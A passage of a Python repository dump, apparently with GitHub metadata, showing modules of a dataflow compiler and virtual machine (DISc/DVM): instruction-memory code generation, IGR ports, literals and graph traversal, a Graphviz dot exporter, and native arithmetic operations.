self.callMap:\n\t\t\tfor idx in self.callMap[node.key]:\n\t\t\t\tself.modifyString(0, idx, \n\t\t\t\t\tlambda str : str % (toKey[0], toKey[1]))\n\t\t\tdel self.callMap[node.key]\n\n\t## Get the from key for a node.\n\tdef getFromKey(self, node):\n\t\treturn self.nodes[node.key][0]\n\n\t## Get the to key for a node.\n\tdef getToKey(self, node):\n\t\treturn self.nodes[node.key][1]\n\n\t## \n\t# Add the index of a string waiting for the address\n\t# of a call to become known.\n\t#\n\t# \\param node\n\t#\t\tThe node that is not bound to an address yet.\n\t# \\param idx\n\t#\t\tThe idx of the string that needs to be updated\n\t#\t\twhen the node is bound.\n\t##\n\tdef addCallIdx(self, node, idx):\n\t\tif node.key in self.callMap:\n\t\t\tself.callMap[node.key].append(idx)\n\t\telse:\n\t\t\tself.callMap.update({node.key : [idx]})\n\n\t##\n\t# Add a string to a chunk.\n\t# This string does not influence keys.\n\t##\n\tdef addString(self, str, chunk):\n\t\tlst = self.memory[chunk]\n\t\tstr = \"%s%s\" % (self.indent * '\\t', str)\n\t\tlst.append(str)\n\n\t##\n\t# Add a string that needs to receive a key\n\t# in the instruction memory.\n\t# \n\t# \\param str\n\t#\t\tA __format string__ that has room for a\n\t#\t\tsingle integer, this means the string should \n\t#\t\tcontain a single %d. This %d will be replaced\n\t#\t\tby the received key.\n\t# \\param chunk\n\t#\t\tThe chunk where we place the string.\n\t#\n\t# \\return\n\t#\t\tA (chunk, key) pair\n\t##\n\tdef addKeyedString(self, str, chunk):\n\t\tkey = self.keys[chunk]\n\t\tself.keys[chunk] += 1\n\t\tstr = str % key\n\n\t\tstr = \"%s%s\" % (self.indent * '\\t', str)\n\t\tself.memory[chunk].append(str)\n\t\treturn (chunk, key)\n\n\t##\n\t# Modify a string in the memory.\n\t# The result of func(str) will be added to the\n\t# instruction memory.\n\t#\n\t# \\param chunk\n\t#\t\tThe chunk where we can find the string.\n\t# \\param idx\n\t#\t\tThe index of the string.\n\t# \\param func\n\t#\t\tThe function to apply on the string.\n\t##\n\tdef modifyString(self, chunk, idx, func):\n\t\tself.memory[chunk][idx] = func(self.memory[chunk][idx])\n\n\t## Return the index of the string that was added last.\n\tdef getIdx(self, chunk):\n\t\treturn len(self.memory[chunk]) - 1\n\t## \n\t# Convenience function to add \n\t# a newline for prettier output.\n\t##\n\tdef addNewline(self, chunk):\n\t\tself.addString('', chunk)\n\n\t## Adds a newline to every chunk\n\tdef addNewlines(self):\n\t\tfor c in xrange(0, self.chunks):\n\t\t\tself.addNewline(c)\n\n\t##\n\t# Convenience function to add a \n\t# comment line for better documented output.\n\t##\n\tdef addCommentLine(self, comment, chunk):\n\t\tself.addString('$ %s' % comment, chunk)\n\n\t## Add a comment to every chunk\n\tdef addCommentLines(self, comment):\n\t\tfor c in xrange(0, self.chunks):\n\t\t\tself.addCommentLine(comment, c)\n\n\t##\n\t# Generate a chunk string.\n\t##\n\tdef createChunk(self, idx):\n\t\treturn \"CHUNK %d\" % idx\n\n\t##\n\t# Add an instruction.\n\t#\n\t# \\param chunk \n\t#\t\tThe chunk this instruction belongs to.\n\t# \\param type\n\t#\t\tThe instruction type (such as OP)\n\t# \\param args\n\t#\t\tThe other arguments, in a list.\n\t#\t\tThese depend on the type of instruction.\n\t#\n\t# \\return\n\t#\tThe (chunk, key) pair of this instruction.\n\t##\n\tdef addInstruction(self, chunk, type, args):\n\t\targStr = \" \".join(map(str, args))\n\t\tins = \"INST %s %s %s\" % (type, '%d', argStr)\n\t\treturn self.addKeyedString(ins, chunk)\n\n\t##\n\t# Add a literal to DIS.\n\t#\n\t# \\param key \n\t# \t\tA (chunk, instruction) key pair.\n\t# \\param port\n\t#\t\tThe port to send the literal to.\n\t# \\param value\n\t#\t\tThe value of the literal.\n\t##\n\tdef addLiteral(self, key, port, value):\n\t\tstr = \"LITR %d %d <= %s\" % (key[1], port, value)\n\t\tself.addString(str, key[0])\n\n\t##\n\t# Add a link to DIS.\n\t#\n\t# Links are not dependent on chunks.\n\t# Currently they are written in the chunk of the\n\t# from instruction.\n\t#\n\t# \\param fromKey \n\t# \t\tThe from (chunk, instruction) key pair.\n\t# \\param fromPort\n\t#\t\tThe port to send from.\t\n\t# \\param toKey \n\t# \t\tThe to (chunk, instruction) key pair.\n\t# \\param toPort\n\t#\t\tThe port to send to.\n\t##\n\tdef addLink(self, fromKey, fromPort, toKey, toPort):\n\t\tstr = \"LINK %d %d %d -> %d %d %d\" % (\n\t\t\tfromKey[0], fromKey[1], fromPort,\n\t\t\ttoKey[0], toKey[1], toPort)\n\n\t\tself.addString(str, fromKey[0])\n\n\t## Link every output of start to an instruction.\n\tdef linkStart(self, key):\n\t\tfor i in xrange(0, self.inputs):\n\t\t\tself.addLink((0,0), i, key, i)\n\n\t## Link the output of a node to stop.\n\tdef linkStop(self, key):\n\t\tself.addLink(key, 0, (0,1), 0)\n\n\t##\n\t# Return the DIS string for the current\n\t# contents of the memories.\n\t##\n\tdef generate(self):\n\t\tbuffer = StringIO.StringIO()\n\t\tbuffer.write('$ Generated by DISc \\n\\n')\n\n\t\tfor i in xrange(0, len(self.memory)):\n\t\t\tbuffer.write(self.createChunk(i))\n\t\t\tbuffer.write('\\n')\n\n\t\t\tchunk = self.memory[i]\n\t\t\tfor str in chunk:\n\t\t\t\tbuffer.write(str)\n\t\t\t\tbuffer.write('\\n')\n\n\t\t\tbuffer.write('\\n')\n\n\t\tres = buffer.getvalue()\n\t\tbuffer.close()\n\t\treturn res" }, { "alpha_fraction": 0.7346048951148987, "alphanum_fraction": 0.7389645576477051, "avg_line_length": 30.11864471435547, "blob_id": "a74781f43a73346e8c7ef8f81a363ea6008b1e47", "content_id": "683d87f0654b11c692e485d6a7e83a70f8baa455", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 79, "num_lines": 59, "path": "/DISc/IGR/literal.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# literal.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.literal\n# \\brief Literal definitions\n# \n# IGR Literals\n##\n\n##\n# Literal\n#\n# Literals are values inherent to the program.\n# Examples include constants in arithmetic expressions,\n# function names, strings, ...\n# \n# Every literal has a value and a target, which is an IGR::port::InputPort.\n##\nclass Literal(object):\n\t\n\t##\n\t# Create a new literal.\n\t#\n\t# \\param value\n\t#\t\tThe value of the literal\n\t# \\param destination\n\t#\t\tThe destination of the literal value\n\t##\n\tdef __init__(self, value, destination):\n\t\tsuper(Literal, self).__init__()\n\t\tself.value = value\n\t\tself.destination = destination\n\n\t## See if this is a port (mainly for traversal)\n\tdef isPort(self): return False" }, { "alpha_fraction": 0.7469413876533508, "alphanum_fraction": 0.7495170831680298, "avg_line_length": 30.693878173828125, "blob_id": "ccda0d63ab32fa366c1454cb747074660e66877e", "content_id": "2259852b05e43e647804bf7c04c2737d02904539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3106, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/DISc/IGR/traverse.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# traverse.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.traverse\n# \\brief IGR Traversals\n# \n# This module defines the various functions\n# that allow us to traverse and transform the \n# IGR graph.\n##\n\nimport graph\n\n##\n# Traverse all the nodes in the program.\n# We traverse over a copy so it's safe to modify the IGR\n# structure while traversing over the graph.\n#\n# \\param nodeProc\n#\t\tThe function that is called when we encounter a node.\n#\t\tnode is passed as an argument to this function.\n# \\param subGraphStart\n#\t\tThe function that is called when we enter a new subgraph.\n#\t\tThe subgraph is passed as an argument.\n# \\param subGraphStop\n#\t\tThe function that is called when we exit a subgraph.\n#\t\tThe subgraph is passed as an argument.\n# \\param skipCompound\n#\t\tShould be true is you want to treat compounds as normal nodes.\n#\t\tIf this value is false, the subgraphs of any compound node will\n#\t\tbe traversed.\n# \\param compoundStart\n#\t\tThe function that is called when we start parsing a compound node.\n#\t\tThe node is passed as an argument to this function.\n#\t\tRemember that we have already called nodeProc on this node!\n# \\param comoundEnd\n#\t\tThe function that is called when we exit a compound node.\n#\t\tThe node in question is passed to the function.\n# \\param subGraphs\n#\t\tThe subgraphs to traverse. Parses the entire program by default.\n##\ndef traverse(\n \tnodeProc, \n\tsubGraphStart,\n\tsubGraphStop, \n\tskipCompound,\n\tcompoundStart,\n\tcompoundStop,\n\tsubGraphs = graph.getSubGraphs()\n\t):\n\n\tdef traverseSubGraph(subGraph, nodeProc):\n\t\tsubGraphStart(subGraph)\n\t\tfor node in list(subGraph.nodes):\n\t\t\tnodeProc(node)\n\t\t\tcheckCompound(node)\n\t\tsubGraphStop(subGraph)\n\n\tdef checkCompound(node):\n\t\tif (not skipCompound) and (node.isCompound()):\n\t\t\tcompoundStart(node)\n\t\t\ttraverse(\n\t\t\t\tnodeProc,\n\t\t\t\tsubGraphStart,\n\t\t\t\tsubGraphStop,\n\t\t\t\tskipCompound,\n\t\t\t\tcompoundStart,\n\t\t\t\tcompoundStop,\n\t\t\t\tnode.subGraphs\n\t\t\t\t)\n\t\t\tcompoundStop(node)\n\n\tfor subGraph in list(subGraphs):\n\t\ttraverseSubGraph(subGraph, nodeProc)\n" }, { "alpha_fraction": 0.6888453960418701, "alphanum_fraction": 0.6919205784797668, "avg_line_length": 27.498008728027344, "blob_id": "10625eb607a30d31314bed4d74c5559972c497fc", "content_id": "c5187655b1d65ff7a3f8d943f89b48774b19b279", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7154, "license_type": "no_license", "max_line_length": 83, "num_lines": 251, "path": "/DVM/dot.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dot.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentat ion files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package dot\n# \\brief dot generator\n#\n# This module defines a tool that allows us \n# to generate graphs from the instruction memory.\n##\n\nimport StringIO\nimport subprocess\nimport core.memory\nimport core.instruction\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\n# ------- #\n# General #\n# ------- #\n\n## Generate a unique idea for a chunk/key pair.\ndef generateIdentifier(chunk, key):\n\tif chunk >= key: return chunk ** 2 + chunk + key \n\telse: return key ** 2 + chunk\n\n## Generate a unique identifier for an instruction.\ndef generateInstIdentifier(inst):\n\treturn generateIdentifier(inst.key[0], inst.key[1])\n\n## Generate a unique identifier for a chunk, key pair.\ndef generateTupleIdentifier(tup):\n\treturn generateIdentifier(tup[0], tup[1])\n\n# ------------ #\n# Instructions #\n# ------------ #\n\ndef processSink(inst):\n\tshape = \"shape = record\"\n\tlabel = \"|\".join([\"<%d>\" % i for i in xrange(max(inst.destinations.keys()) + 1)])\n\tlabel = \"{Sink: %s|{%s}}\" % (inst.key[1], label)\n\tlabel = 'label = \"%s\"' % label\n\treturn \"%s, %s\" % (shape, label)\n\ndef processOp(inst):\n\tshape = \"shape = Mrecord\"\n\n\tlits = [str(l) if l is not None else \"\" for l in inst.litLst]\n\tinputs = \"|\".join([\"<%d> %s\" % (i, lits[i]) for i in xrange(0, inst.totalInputs)])\n\n\tname = inst.operation.__name__\n\tlabel = 'label = \"{{%s} | %s}\"' % (inputs, name)\n\n\treturn \"%s, %s\" % (shape, label)\n\ndef processConst(inst):\n\treturn \"shape = circle, label = %s\" % inst.value\n\ndef processSplit(inst):\n\treturn 'shape = ellipse, label = \"Split\"'\n\ndef processContChange(inst):\n\treturn 'shape = ellipse, label = \"Send: %s\"' % inst.destSink[1]\n\ndef processContRestore(inst):\n\treturn 'shape = ellipse, style = dashed, label = \"\"'\n\ndef processSwitch(inst):\n\treturn \"shape = diamond, label = Switch\"\n\ndef processStop(inst):\n\treturn \"shape = point\"\n\nattributes = {\n\tcore.instruction.OperationInstruction : processOp,\n\tcore.instruction.Constant : processConst,\n\tcore.instruction.Sink : processSink,\n\tcore.instruction.Split : processSplit,\n\tcore.instruction.ContextChange : processContChange,\n\tcore.instruction.ContextRestore : processContRestore,\n\tcore.instruction.Switch : processSwitch,\n\tcore.instruction.StopInstruction : processStop\n}\n\ndef getAttributes(inst):\n\treturn attributes[type(inst)](inst)\n\t\ndef addInst(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tatt = getAttributes(inst)\n\tbuffer.write(\"%s [%s];\\n\" % (key, att))\n\n# ----- #\n# Links #\n# ----- #\n\ndef destMapLinks(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tfor src in inst.destinations:\n\t\tfor dst in inst.destinations[src]:\n\t\t\tdstKey = generateTupleIdentifier(dst[0])\n\t\t\tdstPrt = dst[1]\n\t\t\tbuffer.write(\"%d : %d -> %d : %d ; \\n\" % (key, src, dstKey, dstPrt))\n\ndef destListLinks(buffer, inst):\n\tkey = generateInstIdentifier(inst)\n\tfor dst in inst.destinations:\n\t\tdstKey = generateTupleIdentifier(dst[0])\n\t\tdstPrt = dst[1]\n\t\tbuffer.write(\"%d -> %d : %d ; \\n\" % (key, dstKey, dstPrt))\n\ndef addContextChangeLinks(buffer, inst):\n\tsrcKey = generateInstIdentifier(inst)\n\tretKey = generateTupleIdentifier(inst.retnSink)\n\tbuffer.write(\"%s -> %s ; \\n\" % (srcKey, retKey))\n\ndef addSplitLinks(buffer, inst):\n\tsrcKey = generateInstIdentifier(inst)\n\tdstKey = generateTupleIdentifier(inst.dest)\n\tbuffer.write(\"%s -> %s [style = dashed]; \\n\" % (srcKey, dstKey))\n\ndef addSwitchLinks(buffer, inst):\n\tfor dst in inst.dstLst:\n\t\tsrcKey = generateInstIdentifier(inst)\n\t\tdstKey = generateTupleIdentifier(dst)\n\t\tbuffer.write(\"%s -> %s [style = dashed]; \\n\" % (srcKey, dstKey))\n\ndef addLinks(buffer, inst):\n\t# Soft links\n\tif isinstance(inst, core.instruction.DestinationMap):\n\t\tdestMapLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.DestinationList):\n\t\tdestListLinks(buffer, inst)\n\n\t# Hard links\n\tif isinstance(inst, core.instruction.ContextChange):\n\t\taddContextChangeLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.Switch):\n\t\taddSwitchLinks(buffer, inst)\n\telif isinstance(inst, core.instruction.Split):\n\t\taddSplitLinks(buffer, inst)\n\n# ----- #\n# Other #\n# ----- #\n\ndef dotHeader(buffer):\n\tbuffer.write(\"digraph IGR {\\n\")\n\ndef dotFooter(buffer):\n\tbuffer.write(\"}\")\n\n# ------------- #\n# Parsing Logic #\n# ------------- #\n\n## Generate a dot string from the instruction memory.\ndef dotString():\n\tbuffer = StringIO.StringIO()\n\n\tdotHeader(buffer)\n\tfor mem in core.memory.memory().memory:\n\t\tfor inst in mem:\n\t\t\taddInst(buffer, inst)\n\t\t\taddLinks(buffer, inst)\n\tdotFooter(buffer)\n\n\tstr = buffer.getvalue()\n\tbuffer.close()\n\treturn str\n\n## Write the dot string to a file.\ndef dotFile(path):\n\tf = open(path, 'w')\n\tf.write(dotString())\n\tf.close()\n\n##\n# Convert the instruction memory to dot,\n# save it and run dot on this file.\n#\n# This function should be call with keyword arguments.\n# The default arguments will cause the following behaviour:\n# \t\t* dot is assumed to be in your PATH.\n#\t\t* the dot file will be saved in dis.dot\n#\t\t* the output will be in png format.\n#\t\t* dot will decide where to store the output.\n#\t\t\tWith the default settings this would be in dis.dot.png\n#\n# \\param dotpath\n#\t\tThe path of the dot executable, in case it's not in your PATH\n# \\param path\n#\t\tThe location where the dot file will be stored.\n# \\param format\n#\t\tThe output format of the graph dot creates from the dot file.\n# \\param output\n#\t\tThe location where we store the output of dot.\n#\t\tLeaving this blank will pass the -O option.\n#\t\tThe -O option let's dot choose the path.\n# \\param other\n#\t\tAny other options you want to pass to doth.\n#\t\tThese options should be passed as a list of strings.\n##\ndef dot(\n\tdotpath = \"dot\",\n\tpath = \"dis.dot\", \n\tformat = \"png\", \n\toutput = \"\", \n\tother = [], \n\t):\n\n\tdotFile(path)\n\n\tformat = \"-T\" + format\n\n\tif output: output = \"-o\" + output\n\telse: output = \"-O\"\n\n\ttry:\n\t\tsubprocess.check_call([dotpath, format, path, output, '-q'] + other)\n\texcept subprocess.CalledProcessError, e:\n\t\tlog.error(\"Dot returned with exit code %d\", e.returncode)\n\texcept OSError:\n\t\tlog.error(\"Dot executable not found\")\n\n" }, { "alpha_fraction": 0.6901447176933289, "alphanum_fraction": 0.692328691482544, "avg_line_length": 23.756755828857422, "blob_id": "f0266c629d97a47351d40276773fe9f0824f22db", "content_id": "cb441ea1327e8784709cf2c2739990b5a9cc67ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3663, "license_type": "no_license", "max_line_length": 91, "num_lines": 148, "path": "/DISc/IGR/port.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# ports.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.port\n# \\brief Port definitions\n#\n# Defines the various port types of IGR\n##\n\n##\n# Abstract Port\n#\n# Defines an abstract port, a port is the entry or exit point to any node.\n# A port is aware of the node that it belongs to, as well as the index it has in this node.\n##\nclass Port(object):\n\n\t##\n\t# Creates a new port for a node and an index\n\t#\n\t# \\param node\n\t#\t\tThe node that this port belongs to\n\t# \\param idx\n\t# \t\tThe index that this node belongs to\n\t##\n\tdef __init__(self, node, idx):\n\t\tsuper(Port, self).__init__()\n\t\tself.node = node\n\t\tself.idx = idx\n\n\t##\n\t# Create a string version of the port.\n\t#\n\t# \\return\n\t#\tA string representing this port.\n\t# \tThis string should not be used to recreate this port.\n\t##\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\tidx = \"'\" + str(self.idx) + \"'\"\n\t\tnode = str(self.node)\n\t\treturn name + \" \" + idx + \" of \" + node\n\n\t##\n\t# See if the port is connected to something.\n\t#\n\t# \\return \n\t# \t\tTrue if this node is connected.\n\t##\n\tdef isConnected(self): pass\n\n\t##\n\t# Returns true if this port accepts a literal.\n\t##\n\tdef acceptsLiteral(self): return False\n\n\t## See if this is a port (mainly for traversal)\n\tdef isPort(self): return True\n\n##\n# Port that accepts input for a node.\n##\nclass InputPort(Port):\n\n\tdef __init__(self, node, idx):\n\t\tsuper(InputPort, self).__init__(node, idx)\n\t\tself.source = None\n\n\t##\n\t# Attach this port to another port or literal\n\t# This is an implicit edge representation.\n\t# \n\t# \\param source\n\t#\t\tThe source of the connection, a port or literal.\n\t##\n\tdef attach(self, source):\n\t\tself.source = source\n\n\tdef isConnected(self):\n\t\treturn self.source is not None\n\n\tdef acceptsLiteral(self): \n\t\treturn self.isConnected() and not self.source.isPort()\n##\n# Exit point of a node.\n#\n# An output port can be attached to many input ports of\n# other nodes. Any data sent through the port is delivered\n# to all of these.\n##\nclass OutputPort(Port):\n\n\tdef __init__(self, node, idx):\n\t\tsuper(OutputPort, self).__init__(node, idx)\n\t\tself.targets = []\n\n\t##\n\t# Add a target to this output port,\n\t# has to be an input port.\n\t#\n\t# \\param target\n\t#\t\tThe target to add.\n\t##\n\tdef addTarget(self, target):\n\t\tself.targets.append(target)\n\n\t##\n\t# Add a list of targets to this\n\t# output port.\n\t##\n\tdef addTargets(self, targets):\n\t\tself.targets += targets\n\n\t##\n\t# Remove a target from the port.\n\t#\n\t# \\param target\n\t#\t\tThe target to remove.\n\t##\n\tdef removeTarget(self, target):\n\t\tself.targets.remove(target)\n\n\tdef isConnected(self):\n\t\treturn self.targets != []" }, { "alpha_fraction": 0.6105641722679138, "alphanum_fraction": 0.6135604977607727, "avg_line_length": 18.18062400817871, "blob_id": "e084c19a3216d2b21f4dcaca7cf0313605f615f8", "content_id": "439e9a8b1bf091cd7892b64ce62516f7c18c777f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11681, "license_type": "no_license", "max_line_length": 79, "num_lines": 609, "path": "/DVM/natives.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package natives\n# \\brief DVM Native Operations\n# \n# This module defines all of the native DVM\n# operations.\n##\n\nimport math\nimport copy\n\n# ------------- #\n# Type Creation #\n# ------------- #\n\n## Return the DVM void type.\ndef dvm_Void(): return None\n## Create a DVM Boolean\ndef dvm_Bool(x): return bool(x)\n## Create a DVM Integer\ndef dvm_Int(x): return int(x)\n## Create a DVM Float\ndef dvm_Float(x): return float(x)\n## create a DVM String\ndef dvm_String(x): return str(x)\n\n## \n# Create a DVM Array\n# \n# DVM arrays are indexed starting from 0.\n##\ndef dvm_Array(*x): return list(x)\n\n##\n# Create a DVM Tuple\n# \n# DVM Tuples are indexed start from 0\n##\ndef dvm_tuple(*x): return tuple(x)\n\n# ----------------- #\n# General Operators #\n# ----------------- #\n\n##\n# Do nothing.\n#\n# \\param x Any number of inputs\n# \\return Nothing.\n##\ndef dvm_noOp(*x): pass\n\n##\n# See if the element is void.\n# \\param x A parameter of any type.\n# \\return True if x is void.\n##\ndef dvm_isVoid(x): return x == None\n\n##\n# Check if 2 elements are equal.\n#\n# \\param l, r parameters of any type. \n# \\return True if l and r are equal.\n##\ndef dvm_equals(l, r): return l == r\n\n##\n# Check if 2 elements are not equal.\n#\n# \\param l, r parameters of any type. \n# \\return True if l and r are **not** equal\n##\ndef dvm_notEqual(l, r): return l != r\n\n# ----------------- #\n# Boolean Operators #\n# ----------------- #\n\n## \n# Logical and\n#\n# \\param l, r booleans\n# \\return A boolean\n##\ndef dvm_and(l, r): return l and r\n\n## \n# Logical Or\n#\n# \\param l, r booleans\n# \\return A boolean\n##\ndef dvm_or(l, r): return l or r\n\n##\n# Logical xor\n#\n# \\param l, r booleans\n# \\return a boolean\n##\ndef dvm_xor(l, r): return l ^ r\n\n##\n# Negation\n#\n# \\param x a boolean\n# \\return the negate boolean\n##\ndef dvm_not(x): return not x\n\n# ----------------- #\n# Numeric Operators #\n# ----------------- #\n\n## \n# Negation\n#\n# \\param x a number\n# \\return negated x\n##\ndef dvm_neg(x): return - x\n\n##\n# Absolute value\n# \n# \\param x a number\n# \\return The absolute value of x\n##\ndef dvm_abs(x): return math.fabs(x)\n\n##\n# Addition.\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_add(l, r): return l + r\n\n##\n# Subtraction.\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_sub(l, r): return l - r\n\n##\n# Multiplication.\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_mul(l, r): return l * r\n\n##\n# Subtraction.\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_div(l, r): return l / (r * 1.0)\n\n##\n# Modulo.\n#\n# \\param l,r numbers\n# \\return modulo of l and r \n##\ndef dvm_mod(l, r): return l % r\n\n##\n# Exponent.\n#\n# \\param l, r numbers\n# \\return A number\n##\ndef dvm_exp(l, r): return l ** r\n\n##\n# Round down\n#\n# \\param x A number\n# \\return A number\n##\ndef dvm_floor(x): return math.floor(x)\n\n##\n# Round up\n#\n# \\param x A number\n# \\return A number\n##\ndef dvm_ceil(x): return math.ceil(x)\n\n## \n# Maximum\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_min(l, r): return min(l, r)\n\n## \n# Minimum\n#\n# \\param l, r numeric parameters\n# \\return A number\n##\ndef dvm_max(l, r): return max(l, r)\n\n# ------------------ #\n# Numeric Comparison #\n# ------------------ #\n\n##\n# Smaller than\n#\n# \\param l, r numbers\n# \\return true if l < r\n##\ndef dvm_less(l, r): return l < r\n\n##\n# Greater than\n#\n# \\param l, r numbers\n# \\return true if l > r\n##\ndef dvm_more(l, r): return l > r\n\n##\n# Smaller or equal than\n#\n# \\param l, r numbers\n# \\return true if l =< r\n##\ndef dvm_less_eq(l, r): return l <= r\n\n##\n# Greatar or equal than\n#\n# \\param l, r numbers\n# \\return true if l >= r\n##\ndef dvm_more_eq(l, r): return l >= r\n\n# ----------------- #\n# String Operations #\n# ----------------- 